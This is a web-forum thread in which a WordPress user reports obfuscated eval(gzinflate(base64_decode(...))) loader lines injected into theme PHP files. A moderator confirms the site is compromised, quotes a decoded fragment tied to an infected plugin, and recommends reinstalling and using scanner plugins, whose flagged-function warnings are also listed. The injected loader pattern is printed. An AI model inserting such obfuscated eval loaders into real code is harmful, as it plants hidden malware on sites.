smicky

Platform Pro Eval Code


smicky

I noticed that there were several (like 30 or so) lines of code at the beginning of several of the PHP files in the PlatformPro theme (for example: header, footer, main index template). They all started with <?php /*-random line of code-*/ eval(gzinflate(base64_decode(' 30-40 lines of code- ');?> Now in the past, this has been a sure sign of your theme being hacked. However, those were free themes and not as fancy as platformpro. So I just wanted to make sure that this is here for a reason and not a sign that there is hacked code in my theme....If it isn't supposed to be there and it is hacked, what do you recommend? B

smicky

Here is an example from the main index page:

<?php /*a357267efa9c9b9dda2f259714d9c2ba*/ eval(gzinflate(base64_decode('[base64 payload omitted]')));?>
<?php /* This theme is Copyright © 2008-2010 Andrew Powers, PageLines.com (andrew AT pagelines DOT com) Licensed under the terms of GPL. */
This is from my site at orangebeardmedia.com

Simon

Where did you download the theme? It is definitely compromised!

Simon

Looks like your version of tubepress is causing it. Here is a snippet from the decoded text: `if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/kunden/homepages/12/d100333497/htdocs/orangebeardmedia/wp-content/plugins/tubepress/sys/classes/org/tubepress/api/const/options/names/5b0.php';`

Share on other sites
Simon

Can you send me a zip of your theme folder? And the tubepress folder too if possible?

smicky

Sure (sorry I was MIA for a few days), I will do that today. I was noticing that when I had the TubePress plugin turned on it was screwing multiple things up. What do you suggest for fixing it? BTW, I downloaded the theme from the purchase screen on this site.

smicky
Ok, 6 months later and not only do I have this problem on my site but also on my three other WordPress installations that I host. So... 1. What do you recommend to get rid of it? Is there any way to do it without having to reinstall all four sites? 2. How do I keep from getting this in the first place? I download the themes from the platform site so I know they are secure...

Simon
1. I recommend starting from scratch for all blogs affected. 2. You MUST have used a bad plugin.

smicky
So how do I avoid using a bad plugin in the future...all the plugins I use are installed from within the WordPress dashboard so you would assume that they have been checked by WordPress...

Simon
No, there are thousands of plugins on wp.org, none of them are checked.

smicky
Does PageLines give a list of approved plugins outside of the ones suggested for PlatformPro? Specifically a video plugin?

Simon
@smicky They are approved in that they work as intended within the theme; we do not do security audits on any plugins. All I can suggest is installing Theme-Check and its sister Plugin-Check. Both plugins written by me ;) but anyway they scan for bad code in the plugins and themes; you will need both installed.

smicky
Will do thanks....and very subtle on the self promotion.. ;)

smicky
One more question.... I am using both the theme checker and the plugin checker and they are working well! One of the plugins that I use and that is recommended by Platform is Disqus...however I got the following warnings when I ran the plugin check:

WARNING: Found ini_set in the file disqus-comment-system/lib/api/disqus/url.php. Themes should not change server PHP settings.
Line 205: ini_set('user_agent', USER_AGENT);

WARNING: Found ini_set in the file disqus-comment-system/export.php. Themes should not change server PHP settings.
Line 6: @ini_set('memory_limit', '256M');

WARNING: Found eval in the file disqus-comment-system/lib/api/disqus/json.php. eval() is not allowed..
Line 258: return eval('return ''.str_replace(''',''',$buf).'';');

WARNING: Found base64_encode in the file disqus-comment-system/disqus.php. base64_encode() is not allowed.
Line 1278: $user_data = base64_encode(cf_json_encode($user_data));

WARNING: fwrite was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations.
Line 146: fwrite($fp, $req);

WARNING: fsockopen was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations.
Line 100: function _dsq_fsockopen_urlopen($url, $postdata, &$response, $file_name, $file_field) {
Line 132: $fp = @fsockopen($url_pieces['host'], $url_pieces['port'], $errno, $errstr, SOCKET
Line 232: * Attempts to use cURL, fopen(), or fsockopen(), whichever is available
Line 260: // Try curl, fsockopen, fopen + stream (PHP5 only), exec wget
Line 277: // TODO: Find the failure condition for fsockopen() (sockets?)
Line 278: _dsq_fsockopen_urlopen($url, $postdata, $response, $file_name, $file_field);
Line 292: return 'fsockopen';

WARNING: fopen was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations.
Line 180: function _dsq_fopen_urlopen($url, $postdata, &$response, $file_name, $file_field) {
Line 207: $fp = fopen($url, 'rb', false, $ctx);
Line 232: * Attempts to use cURL, fopen(), or fsockopen(), whichever is available
Line 260: // Try curl, fsockopen, fopen + stream (PHP5 only), exec wget
Line 274: } else if(ini_get('allow_url_fopen') && function_exists('stream_get_contents')) {
Line 275: _dsq_fopen_urlopen($url, $postdata, $response, $file_name, $file_field);
Line 289: } else if(ini_get('allow_url_fopen') && function_exists('stream_get_contents')) {
Line 290: return 'fopen';

WARNING: file_get_contents was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations.
Line 32: $content[] = file_get_contents($file_name);

WARNING: curl_init was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations.
Line 56: $c = curl_init($url);
Line 261: if(function_exists('curl_init')) {
Line 287: if(function_exists('curl_init')) {

WARNING: curl_exec was found in the file disqus-comment-system/lib/api/disqus/url.php possible file operations.
Line 77: $data = curl_exec($c);

When I get warnings like this, I am inclined not to install the plugin...your thoughts?
